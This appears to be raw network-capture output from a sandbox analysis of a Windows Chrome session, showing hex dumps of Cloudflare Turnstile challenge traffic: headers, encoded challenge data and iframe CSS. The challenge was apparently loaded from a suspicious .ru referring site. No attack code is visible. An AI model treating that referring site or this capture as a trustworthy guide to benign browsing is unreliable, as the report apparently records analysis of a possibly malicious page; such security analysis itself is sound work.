                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8470087e2d3c42ca-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:15 UTC1042INData Raw: 34 37 36 38 0d 0a 6f 49 43 6f 6f 34 4c 48 76 73 75 47 75 38 4b 2b 69 34 61 48 74 63 72 48 70 62 53 70 73 38 2f 4f 72 36 72 62 75 36 48 58 30 63 61 7a 77 62 6e 54 74 4f 76 6e 33 4c 6a 76 36 38 7a 41 34 74 2f 56 79 65 69 31 32 65 33 56 79 64 6a 4d 37 64 45 41 77 37 72 55 39 75 54 45 32 65 50 58 2b 2b 7a 4d 7a 2b 6a 64 41 64 45 49 41 76 48 6a 38 65 6b 46 37 52 7a 55 47 2b 6f 51 37 51 44 79 2f 52 41 69 2b 68 77 57 42 2f 63 47 2f 51 33 2b 49 43 51 76 41 68 49 69 4a 41 51 53 43 68 6e 78 4c 44 41 37 44 78 34 75 4d 52 41 65 46 69 67 61 53 51 56 46 47 43 59 38 50 42 77 72 47 6b 49 78 45 55 77 77 4a 45 67 32 4e 42 78 4b 48 56 45 65 50 32 46 57 50 68 78 6e 4f 6a 68 47 59 56 68 74 59 6d 31 67 50 56 6c 41 59 32 31 48 4b 47 74 76 4e 6e 70 79 63 33 49 37 62 33 5a 69 66
                                                                                                                                                              Data Ascii: 4768oICoo4LHvsuGu8K+i4aHtcrHpbSps8/Or6rbu6HX0cazwbnTtOvn3Ljv68zA4t/Vyei12e3VydjM7dEAw7rU9uTE2ePX++zMz+jdAdEIAvHj8ekF7RzUG+oQ7QDy/RAi+hwWB/cG/Q3+ICQvAhIiJAQSChnxLDA7Dx4uMRAeFigaSQVFGCY8PBwrGkIxEUwwJEg2NBxKHVEeP2FWPhxnOjhGYVhtYm1gPVlAY21HKGtvNnpyc3I7b3Zif
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 7a 36 57 56 6b 36 75 52 72 5a 62 50 78 35 7a 51 71 36 33 41 6c 4c 4f 31 33 4d 4f 30 6f 37 50 42 6e 61 6e 71 78 71 7a 75 34 4d 4c 6a 31 4f 48 43 30 4f 37 30 32 36 33 52 31 74 72 79 34 66 33 69 34 66 76 77 7a 67 54 49 79 63 66 2b 79 75 54 74 2f 73 62 74 36 75 62 39 34 75 55 4b 31 52 72 70 35 42 6b 62 44 50 62 76 49 74 6a 72 32 2f 6b 69 46 66 76 6c 33 41 50 71 35 75 51 49 4d 75 33 78 45 65 6f 58 41 53 59 33 46 51 58 31 37 76 73 6f 4e 77 34 67 46 7a 55 36 2f 68 52 48 50 41 4d 2f 48 55 41 48 51 6a 46 45 43 30 5a 4c 53 41 39 4d 4b 55 77 54 54 7a 31 51 46 31 51 63 56 42 74 5a 4e 56 67 66 58 46 39 63 49 32 46 73 4e 6b 74 41 61 53 74 41 4b 30 42 69 5a 6e 46 6a 57 6b 51 32 56 31 31 4f 59 47 78 70 59 58 35 73 62 6e 35 64 66 57 6c 71 65 57 4a 68 69 49 56 34 59 34 65
                                                                                                                                                              Data Ascii: z6WVk6uRrZbPx5zQq63AlLO13MO0o7PBnanqxqzu4MLj1OHC0O70263R1try4f3i4fvwzgTIycf+yuTt/sbt6ub94uUK1Rrp5BkbDPbvItjr2/kiFfvl3APq5uQIMu3xEeoXASY3FQX17vsoNw4gFzU6/hRHPAM/HUAHQjFEC0ZLSA9MKUwTTz1QF1QcVBtZNVgfXF9cI2FsNktAaStAK0BiZnFjWkQ2V11OYGxpYX5sbn5dfWlqeWJhiIV4Y4e
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 63 2f 44 72 5a 66 55 73 4e 53 32 6e 4d 43 2b 75 64 65 2b 6d 71 66 41 70 37 79 66 7a 73 75 77 35 63 66 6b 76 71 66 73 35 62 4c 74 74 73 33 6d 39 76 54 53 33 2b 72 7a 79 39 44 50 30 4f 48 6b 33 72 7a 42 42 39 37 5a 44 73 6e 49 45 77 72 4d 33 77 66 32 30 2f 44 51 36 68 6a 32 38 42 66 66 39 2f 77 63 2b 43 41 64 45 50 6f 64 47 41 73 74 2b 77 7a 39 4a 79 30 78 49 69 72 73 4b 4f 30 34 39 78 63 73 4e 53 73 4b 4d 6a 6b 7a 46 68 59 54 4e 6a 38 59 4d 54 6c 44 48 67 55 71 4e 30 41 4c 48 42 31 42 49 79 30 4e 4a 31 51 31 4c 56 4d 63 4e 44 6c 59 4e 56 78 5a 54 44 64 65 56 79 56 56 58 6d 42 55 53 32 52 4d 50 6d 64 74 63 57 4a 71 4d 47 67 75 65 44 68 59 52 6e 56 72 53 6e 4a 35 63 31 5a 57 55 33 61 42 57 45 4a 30 67 46 35 35 65 48 65 49 66 59 79 4b 5a 6b 36 50 6a 49 74 79
                                                                                                                                                              Data Ascii: c/DrZfUsNS2nMC+ude+mqfAp7yfzsuw5cfkvqfs5bLtts3m9vTS3+rzy9DP0OHk3rzBB97ZDsnIEwrM3wf20/DQ6hj28Bff9/wc+CAdEPodGAst+wz9Jy0xIirsKO049xcsNSsKMjkzFhYTNj8YMTlDHgUqN0ALHB1BIy0NJ1Q1LVMcNDlYNVxZTDdeVyVVXmBUS2RMPmdtcWJqMGgueDhYRnVrSnJ5c1ZWU3aBWEJ0gF55eHeIfYyKZk6PjIty
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 7a 51 73 74 50 69 31 4c 58 58 6e 39 4f 38 78 4b 66 63 76 2b 2f 65 32 73 62 69 31 65 6e 4b 78 2b 7a 4e 30 73 6a 37 30 2f 6e 34 74 2f 65 36 77 4f 58 43 41 75 66 39 35 4d 50 5a 32 66 33 32 33 42 41 4e 38 4d 76 4d 43 76 55 56 36 50 62 34 39 64 54 6f 45 69 44 73 45 76 58 74 38 42 4c 35 41 53 63 68 2b 52 7a 34 49 77 48 34 4b 7a 49 47 41 68 55 79 39 53 6b 50 4c 6a 51 72 4c 79 66 35 50 78 38 37 47 79 34 32 48 68 34 61 51 52 67 38 50 43 35 50 43 79 41 5a 4a 6b 45 79 56 55 52 44 44 67 38 71 4d 52 67 73 47 43 38 63 57 32 49 62 49 54 55 2f 4d 31 64 58 53 44 70 46 57 31 74 43 58 30 4a 52 61 6b 31 42 55 45 56 53 4e 47 56 4f 52 56 6c 58 54 55 6c 7a 66 6c 4a 75 5a 57 52 57 66 47 5a 70 59 47 42 57 58 34 31 72 58 31 2b 43 58 6f 31 4f 6a 6d 79 56 56 58 42 57 61 59 6c 58 6b
                                                                                                                                                              Data Ascii: zQstPi1LXXn9O8xKfcv+/e2sbi1enKx+zN0sj70/n4t/e6wOXCAuf95MPZ2f323BAN8MvMCvUV6Pb49dToEiDsEvXt8BL5ASch+Rz4IwH4KzIGAhUy9SkPLjQrLyf5Px87Gy42Hh4aQRg8PC5PCyAZJkEyVURDDg8qMRgsGC8cW2IbITU/M1dXSDpFW1tCX0JRak1BUEVSNGVORVlXTUlzflJuZWRWfGZpYGBWX41rX1+CXo1OjmyVVXBWaYlXk
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 76 6e 72 6d 32 77 75 71 38 74 38 6e 71 75 37 7a 67 38 75 36 2f 39 62 50 4f 2b 50 54 38 76 50 76 38 34 4d 33 2b 31 76 54 42 42 4e 76 35 30 51 67 47 32 39 76 5a 7a 75 62 4a 34 4d 6e 53 31 4e 37 76 42 2f 41 62 35 4f 66 63 35 78 37 38 47 2b 6f 53 47 75 54 34 4a 68 4d 41 39 52 62 2b 36 53 77 44 42 4f 72 37 42 79 58 77 4e 51 30 45 41 6a 66 36 4c 54 30 38 2f 68 41 4c 51 6a 4c 36 45 55 49 68 52 76 73 42 46 42 6b 65 47 67 38 2f 4b 67 6b 63 50 79 4d 70 56 69 6b 72 45 53 5a 58 4c 53 70 4f 47 79 78 66 54 57 56 6d 5a 7a 74 6c 4b 53 74 6d 4e 79 78 76 51 79 39 4b 50 45 68 45 50 7a 64 6c 64 30 38 78 65 54 63 39 53 56 52 33 57 55 4e 75 56 56 65 46 63 6d 6c 69 51 57 52 37 59 55 56 2b 58 57 46 64 61 47 56 75 6c 59 56 74 63 6d 52 53 6e 6d 68 6e 61 4a 5a 68 6f 35 4a 58 58 71
                                                                                                                                                              Data Ascii: vnrm2wuq8t8nqu7zg8u6/9bPO+PT8vPv84M3+1vTBBNv50QgG29vZzubJ4MnS1N7vB/Ab5Ofc5x78G+oSGuT4JhMA9Rb+6SwDBOr7ByXwNQ0EAjf6LT08/hALQjL6EUIhRvsBFBkeGg8/KgkcPyMpVikrESZXLSpOGyxfTWVmZztlKStmNyxvQy9KPEhEPzdld08xeTc9SVR3WUNuVVeFcmliQWR7YUV+XWFdaGVulYVtcmRSnmhnaJZho5JXXq
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 36 71 33 73 6f 2b 2f 63 71 72 33 7a 38 4b 71 76 39 75 58 6b 75 2f 76 6f 39 63 6e 2b 2f 63 37 46 41 51 48 38 76 77 6f 46 43 74 55 4c 43 51 6e 50 45 50 77 56 46 68 4d 52 31 75 63 59 46 52 55 64 48 42 6e 5a 31 78 38 4e 38 75 49 68 45 68 48 6f 4b 4f 6e 6c 33 79 77 44 4c 65 38 77 4c 66 49 45 4e 44 45 31 39 6a 67 50 50 66 4d 38 2f 54 33 7a 51 6a 33 39 41 30 55 62 46 2f 74 46 52 68 63 4b 54 53 51 36 47 6c 41 39 49 78 4e 56 4b 31 45 61 57 45 59 6f 4c 46 6c 5a 4d 79 42 64 54 54 4d 63 59 57 45 62 49 47 70 6c 4f 79 35 70 61 57 55 77 62 56 30 75 4c 48 4e 69 59 54 5a 33 4f 6e 30 39 65 58 6d 42 51 59 42 58 65 59 61 47 67 58 31 4b 68 30 6f 2f 53 34 75 4a 6b 55 2b 52 5a 35 4a 6b 6b 34 46 4c 54 4a 68 61 62 31 53 62 58 6c 4e 59 6e 59 36 4e 59 71 47 52 59 6d 71 6f 6c 6e 64
                                                                                                                                                              Data Ascii: 6q3so+/cqr3z8Kqv9uXku/vo9cn+/c7FAQH8vwoFCtULCQnPEPwVFhMR1ucYFRUdHBnZ1x8N8uIhEhHoKOnl3ywDLe8wLfIENDE19jgPPfM8/T3zQj39A0UbF/tFRhcKTSQ6GlA9IxNVK1EaWEYoLFlZMyBdTTMcYWEbIGplOy5paWUwbV0uLHNiYTZ3On09eXmBQYBXeYaGgX1Kh0o/S4uJkU+RZ5Jkk4FLTJhab1SbXlNYnY6NYqGRYmqolnd
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 50 48 31 35 37 57 78 7a 4c 72 63 39 76 6e 58 41 73 76 53 77 75 54 35 42 66 54 6e 78 39 62 4a 41 2b 6f 4b 35 78 4c 62 35 4e 4c 39 30 2b 4c 56 44 2f 59 5a 42 67 62 62 36 74 30 54 2f 68 37 37 4a 75 2f 35 49 68 4c 6e 39 75 6b 66 43 79 30 61 47 75 2f 2b 38 54 4d 54 4d 68 41 36 42 41 34 6d 4a 76 73 4c 2f 54 38 66 51 53 34 75 42 42 4d 47 51 79 64 47 4a 45 34 59 49 79 51 36 45 42 38 53 54 7a 4e 56 51 6b 49 59 4a 78 6f 59 4f 31 6f 34 59 69 77 32 49 30 34 6b 4d 79 59 6b 52 32 6c 57 56 69 77 37 4c 69 68 50 62 6b 78 32 51 45 64 79 59 6a 68 48 4f 6a 52 62 66 57 70 71 51 45 39 44 54 57 4f 43 59 49 70 55 57 33 5a 32 54 46 74 50 57 57 2b 52 66 6e 35 55 59 31 5a 59 64 35 5a 30 6e 6d 68 77 64 49 70 67 62 32 4a 6b 67 36 57 56 69 47 6c 32 6d 57 74 75 5a 58 69 69 68 47 56 71
                                                                                                                                                              Data Ascii: PH157WxzLrc9vnXAsvSwuT5BfTnx9bJA+oK5xLb5NL90+LVD/YZBgbb6t0T/h77Ju/5IhLn9ukfCy0aGu/+8TMTMhA6BA4mJvsL/T8fQS4uBBMGQydGJE4YIyQ6EB8STzNVQkIYJxoYO1o4Yiw2I04kMyYkR2lWViw7LihPbkx2QEdyYjhHOjRbfWpqQE9DTWOCYIpUW3Z2TFtPWW+Rfn5UY1ZYd5Z0nmhwdIpgb2Jkg6WViGl2mWtuZXiihGVq
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 75 35 7a 38 2f 30 30 39 66 4c 79 39 37 63 2b 4d 48 68 77 50 6a 6f 42 41 48 74 31 2b 6a 6b 36 64 49 50 42 77 62 50 46 76 4c 52 46 77 58 56 31 77 7a 65 2b 78 45 66 41 65 44 64 48 76 34 48 2b 67 62 38 49 67 45 77 35 79 45 45 4b 43 49 66 45 78 55 4b 47 78 6b 4a 4d 44 77 62 48 51 45 6a 4c 44 63 77 51 41 39 45 4f 77 55 43 51 69 4d 6f 48 79 6f 68 4c 53 4e 45 52 30 41 71 52 78 68 52 4b 69 59 55 4d 54 42 67 54 31 73 79 50 57 4e 51 4f 6b 4a 58 59 7a 64 48 50 55 78 4e 59 47 77 39 5a 30 41 7a 4c 46 46 6f 53 57 70 4c 62 45 31 75 54 33 69 41 4f 55 46 68 63 6b 4e 35 5a 47 6d 4b 56 59 57 48 57 59 4b 51 6a 6d 46 74 61 46 52 54 6a 34 35 36 6d 70 74 57 64 4a 43 4d 6e 70 64 76 57 61 56 34 65 58 5a 78 71 61 65 58 61 49 53 75 62 33 43 4a 6e 6f 69 7a 74 49 36 70 72 34 71 6f 70
                                                                                                                                                              Data Ascii: u5z8/009fLy97c+MHhwPjoBAHt1+jk6dIPBwbPFvLRFwXV1wze+xEfAeDdHv4H+gb8IgEw5yEEKCIfExUKGxkJMDwbHQEjLDcwQA9EOwUCQiMoHyohLSNER0AqRxhRKiYUMTBgT1syPWNQOkJXYzdHPUxNYGw9Z0AzLFFoSWpLbE1uT3iAOUFhckN5ZGmKVYWHWYKQjmFtaFRTj456mptWdJCMnpdvWaV4eXZxqaeXaISub3CJnoiztI6pr4qop


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              25192.168.2.449771104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:15 UTC787OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/1af7i/0x4AAAAAAAQGgmt388O38mZL/auto/normal HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:15 UTC921INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:15 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                              cross-origin-embedder-policy: require-corp
                                                                                                                                                              cross-origin-opener-policy: same-origin
                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                              document-policy: js-profiling
                                                                                                                                                              origin-agent-cluster: ?1
                                                                                                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                              referrer-policy: same-origin
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008825fbf8ce0-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:15 UTC448INData Raw: 37 63 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c
                                                                                                                                                              Data Ascii: 7c19<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scal
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 3c 73 74 79 6c 65 3e 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 20 7b 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 74 72 6f 6b 65 20 7b 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 30 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 20 7b 0a 20 20 30 25 2c 20 31 30 30 25 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 20 20 35 30 25 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 31 2c 20 31 2c 20 31 29 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 20 7b
                                                                                                                                                              Data Ascii: <style>@keyframes rotate { 100% { transform: rotate(360deg); }}@keyframes stroke { 100% { stroke-dashoffset: 0; }}@keyframes scale { 0%, 100% { transform: none; } 50% { transform: scale3d(1, 1, 1); }}@keyframes fill {
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 38 70 78 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 7d 0a 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 30 65 30 65 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c
                                                                                                                                                              Data Ascii: font-size: 16px; font-weight: 700;}p { margin: 8px 0; text-align: center; font-size: 20px; font-weight: 400;}#content { display: flex; align-items: center; justify-content: space-between; border: 1px solid #e0e0e0; background-col
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 72 63 6c 65 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 32 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 30 33 38 31 32 37 3b 0a 20 20 66 69 6c 6c 3a 20 23 30 33 38 31 32 37 3b 0a 7d 0a 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 61 61 39 33 37 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 2e 70 31 20 7b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 61 61 39 33 37 3b 0a 7d 0a 2e 74 68 65 6d 65 2d
                                                                                                                                                              Data Ascii: rcle { stroke-dashoffset: 0; stroke-width: 2; stroke-miterlimit: 10; stroke: #038127; fill: #038127;}.theme-dark #success-icon { box-shadow: inset 0 0 0 #0aa937;}.theme-dark #success-icon .p1 { box-shadow: inset 0 0 0 #0aa937;}.theme-
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 3a 3a 61 66 74 65 72 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 66 62 61 64 34 31 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6f 66 66 6c 61 62 65 6c 20 23 66 61 69 6c 2d 69 63 6f 6e 20 7b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 66 66 66 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 2d 64 61 72 6b 20 30 2e 34 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 30 2e 34 73 20 66 6f 72 77 61 72 64 73 2c 20 73 63 61 6c 65 20 30 2e 33 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 30 2e 39 73 20 62 6f 74 68 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 68 31 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66
                                                                                                                                                              Data Ascii: put:checked ~ .mark::after { border-color: #fbad41;}.theme-dark .offlabel #fail-icon { box-shadow: inset 0 0 0 #fff; animation: fillfail-offlabel-dark 0.4s ease-in-out 0.4s forwards, scale 0.3s ease-in-out 0.9s both;}.theme-dark h1 { color: #f
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 3a 68 6f 76 65 72 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78 70 69
                                                                                                                                                              Data Ascii: :hover, .theme-dark #fr-helper-link:focus,.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:hover,.theme-dark #fr-helper-loop-link:focus { color: #949494;}.theme-dark #expired-refresh-link { color: #bbb;}.theme-dark #expi
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 63 34 34 64 30 65 3b 0a 20 20 66 69 6c 6c 3a 20 6e 6f 6e 65 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 74 72 6f 6b 65 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 35 2c 20 30 2c 20 30 2e 34 35 2c 20 31 29 20 66 6f 72 77 61 72 64 73 3b 0a 7d 0a 0a 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 35 30 25 20 35 30 25 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 34 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 34 38 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 74 72 6f 6b 65 20 30 2e 33 73 20 63 75 62 69 63 2d 62 65 7a 69 65
                                                                                                                                                              Data Ascii: troke-miterlimit: 10; stroke: #c44d0e; fill: none; animation: stroke 0.6s cubic-bezier(0.65, 0, 0.45, 1) forwards;}.failure-cross { transform-origin: 50% 50%; stroke-dasharray: 48; stroke-dashoffset: 48; animation: stroke 0.3s cubic-bezie
                                                                                                                                                              2024-01-17 16:39:15 UTC1369INData Raw: 6c 75 74 65 3b 0a 20 20 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 6c 65 66 74 3a 20 31 38 70 78 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 31 73 20 65 61 73 65 2d 69 6e 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 39 39 39 38 3b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 36 64 36 64 36 64 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 77 69 64 74 68 3a 20 32 34 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29
                                                                                                                                                              Data Ascii: lute; top: 20px; left: 18px; transition: all 0.1s ease-in; z-index: 9998; border: 2px solid #6d6d6d; border-radius: 3px; background: #fff; width: 24px; height: 24px; animation: scale-up-center 0.4s cubic-bezier(0.55, 0.085, 0.68, 0.53)
